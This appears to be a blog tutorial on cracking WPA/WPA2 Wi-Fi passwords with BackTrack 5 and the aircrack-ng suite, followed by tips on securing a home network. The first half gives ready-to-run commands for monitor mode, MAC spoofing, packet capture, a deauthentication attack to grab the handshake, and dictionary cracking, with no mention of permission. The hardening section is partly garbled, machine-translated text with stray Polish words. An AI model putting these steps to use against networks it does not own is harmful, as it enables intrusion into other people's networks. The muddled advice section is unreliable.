Backtrek 5 (Download)
Compatible Wifi Card (Optional)
Rules to follow
1.Now you First install a Vmware in your system.
2. Then you create a virtual machine in your Vmware.
3.Then power on your machine.
4.And Now your all set to go…just simply follow below steps…now
Steps to Follow
The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
airmon-ng start wlan0
(Optional) Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Then, press “
Ctrl+c” to break the program.
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0
*where -c is the channel
-w is the file to be written
–bssid is the BSSID
This terminal is keeping running.open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake
Use the John the Ripper as word list to crack the WPA/WP2 password aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
- You can use your own password wordlist.
Secure your wifi1. Choice encryptA simple matter . WEP can be cracked in a few minutes, and WPA is relatively weaker than WPA2 . Choose WPA2 .No WEP, not WPA . End of story .
WPA2 networks can only attack dictionary attacks , so …
2. Setting a strong password
WPA2 forces us to use at least 8 character password , which in itself is good , but each character increases security exponentially , that is, with each a pool of all possible to generate passwords of this length greatly increases. So it really makes a difference whether you use a password of 8 or a 9 characters.
3. Change the default network name ( SSID)
You have to remember to never leave the default network name , such as ” Netgear ” and ” Asus ” . Attackers often carry with them so . rainbow tables , so that breaking WPA/WPA2 password for the network with the same name takes just a few minutes. ( This is explained in detail in the operation of WPA/WPA2 )If a list of the vein , or as the SSID you set a random string of characters (not recommended ) , crackers utrudnicie life.4. Change the password to the router
Suppose that someone has hacked into your network. Most at 192.168.1.1 ( or similar ) is the router control panel where you can do anything : change the password for your network , change the name , disable it , and more.Very often, the router itself is protected by a username and password (admin , admin ) , which is not a big obstacle for burglars . Also keep in mind to change the defaults wherever possible.
5. Limiting coverage
Most WiFi intrusions followed by ” outsiders” . The neighborhood wireless network card detects a lot of potential victims , most of the apartments around us or from nearby buildings.WiFi network coverage should be chosen so as to cover the whole house , but nothing else. This will prevent any unwanted shares . Frequently in the options you can set the router transmitter power .
6. Filtering MAC / hide the SSID
All the networks are saying not to use the above . techniques , as they are very easy to break. It is of course true, but … why not hinder life crackers ? 🙂By the way, when we go on vacation and forget to turn off the router and the network is empty there in the ether , hiding the SSID and MAC address filtering is a not – for – workaround. We can not podszpiegować who logs on to the network and change your MAC address on him, because no one logs on to the network. Likewise, we can not use the attack revoke credentials to check a hidden network name , because it is who perform the attack .
Get more more interesting article like this
in your inbox
Subscribe to our mailing list and get daily new articles and updates to your email inbox.